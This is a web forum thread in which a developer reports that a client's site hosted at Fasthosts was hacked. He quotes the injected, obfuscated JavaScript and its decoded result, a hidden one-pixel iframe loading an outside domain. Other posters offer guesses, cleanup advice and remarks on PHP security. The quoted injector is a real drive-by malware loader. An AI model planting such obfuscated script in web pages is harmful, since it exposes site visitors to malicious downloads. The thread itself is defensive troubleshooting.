Hacked websites
#1
Scooby Regular
Thread Starter
Join Date: Apr 1999
Location: Bore Knee Muff
Posts: 3,666
Likes: 0
Received 0 Likes
on
0 Posts
Hacked websites
Anyone any experience of this.
I have a clients site hosted at Fasthosts.
Their home page suddenly took longer to load and I noticed some javascript...
<script language="JavaScript">
e = '0x00' + '46';
str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE% A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE %A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E 8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8% E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA %F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%F B";
str=tmp='';
for(i=0;i<str1.length;i+=3)
{
tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}
Then it writes that string out.....
</script>
The result of that is the following decrypted:
<div style="visibility:hidden">
<iframesrc="http://hhhg1.com/ment/" width=1height=1>
</iframe>
</div>
Anyone else seen this?
Know what it does?
Rich
I have a clients site hosted at Fasthosts.
Their home page suddenly took longer to load and I noticed some javascript...
<script language="JavaScript">
e = '0x00' + '46';
str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE% A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE %A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E 8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8% E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA %F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%F B";
str=tmp='';
for(i=0;i<str1.length;i+=3)
{
tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}
Then it writes that string out.....
</script>
The result of that is the following decrypted:
<div style="visibility:hidden">
<iframesrc="http://hhhg1.com/ment/" width=1height=1>
</iframe>
</div>
Anyone else seen this?
Know what it does?
Rich
#2
Scooby Regular
Join Date: Sep 1999
Location: Swindon, Wiltshire Xbox Gamertag: Gutgouger
Posts: 6,956
Likes: 0
Received 0 Likes
on
0 Posts
Well, it creates a hidden iframe, the src of which points to a web address that (at the moment) doesn't seem to exist. So it won't do anything at the moment.
My guess is that it was (or will be) trying to install some dodgy tracking cookies or something of the ilk...
My guess is that it was (or will be) trying to install some dodgy tracking cookies or something of the ilk...
#3
my g/f's site got hacked recently. all the links in the site were replaced with links to a viagra type site and there was similar javascript in the header that you have.
fortunately I had a backup, so wiped the site, changed the password and re uploaded.
had to kill all my local cookies etc too
bastids
fortunately I had a backup, so wiped the site, changed the password and re uploaded.
had to kill all my local cookies etc too
bastids
#7
Scooby Regular
Thread Starter
Join Date: Apr 1999
Location: Bore Knee Muff
Posts: 3,666
Likes: 0
Received 0 Likes
on
0 Posts
Yes and MySql - Any top tips on what to look for cottonfoo?
Contact form stuffing?
In theory only me and their IT support company have FTP access to the site.
Contact form stuffing?
In theory only me and their IT support company have FTP access to the site.
Trending Topics
#8
Scooby Regular
Join Date: Jan 2001
Location: still behind twin turbos
Posts: 469
Likes: 0
Received 0 Likes
on
0 Posts
PHP has some fundamental issues as it is, let alone any flaws present in any software written in it:
PHP security under scrutiny | The Register
The PHP problems have been going on for a while.
"The PHP Group will jump into your boat as soon you try to blame PHP's security problems on the user, but the moment you criticise the security of PHP itself you become persona non grata."
From Retired from security@php.net - PHP Security Blog
PHP security under scrutiny | The Register
The PHP problems have been going on for a while.
"The PHP Group will jump into your boat as soon you try to blame PHP's security problems on the user, but the moment you criticise the security of PHP itself you become persona non grata."
From Retired from security@php.net - PHP Security Blog
#9
Scooby Regular
iTrader: (6)
Join Date: Apr 2005
Location: Stroke it baby!
Posts: 33,828
Likes: 0
Received 0 Likes
on
0 Posts
my g/f's site got hacked recently. all the links in the site were replaced with links to a viagra type site and there was similar javascript in the header that you have.
fortunately I had a backup, so wiped the site, changed the password and re uploaded.
had to kill all my local cookies etc too
bastids
fortunately I had a backup, so wiped the site, changed the password and re uploaded.
had to kill all my local cookies etc too
bastids
#10
Scooby Regular
Join Date: Jan 2001
Location: still behind twin turbos
Posts: 469
Likes: 0
Received 0 Likes
on
0 Posts
#11
Scooby Regular
have a look at the files in the directory and make sure there is no file called up.php which is a common hacker tool they use. Once on your site, they can do as they please to your website. Only have one PHP site and its been hacked a number of times, every time through the php.
#12
Scooby Regular
Thread Starter
Join Date: Apr 1999
Location: Bore Knee Muff
Posts: 3,666
Likes: 0
Received 0 Likes
on
0 Posts
how does they write stuff into your files?
Is it because the IUSR (Yes windows IIS) has write permissions or something...
Sadly I don't have control over the server itself.
I managed to upload some code to allow me complete access to another ISPs shared site servers files and folders. Obviously I needed access to get the file up there and I would imagine I could do the same thing and insert my javascript to every file on the server should I desire...
I've not really found any 'this is how they did it' or 'this is how I stopped it' type pages though.
Any other links cottonfoo?
Is it because the IUSR (Yes windows IIS) has write permissions or something...
Sadly I don't have control over the server itself.
I managed to upload some code to allow me complete access to another ISPs shared site servers files and folders. Obviously I needed access to get the file up there and I would imagine I could do the same thing and insert my javascript to every file on the server should I desire...
I've not really found any 'this is how they did it' or 'this is how I stopped it' type pages though.
Any other links cottonfoo?
#13
Scooby Regular
Join Date: Jan 2001
Location: still behind twin turbos
Posts: 469
Likes: 0
Received 0 Likes
on
0 Posts
Loads, but this is a family forum There isn't really much you can do unless you have control of the server. Have you told the ISP their services have been compromised?
I'd search on "<the PHP application you use> exploits security" or something to see possible entry points, make sure you know exactly what versions of what you're using.
I'd search on "<the PHP application you use> exploits security" or something to see possible entry points, make sure you know exactly what versions of what you're using.
Thread
Thread Starter
Forum
Replies
Last Post
jobegold@hotmail.co.uk
ScoobyNet General
2
27 September 2015 09:44 PM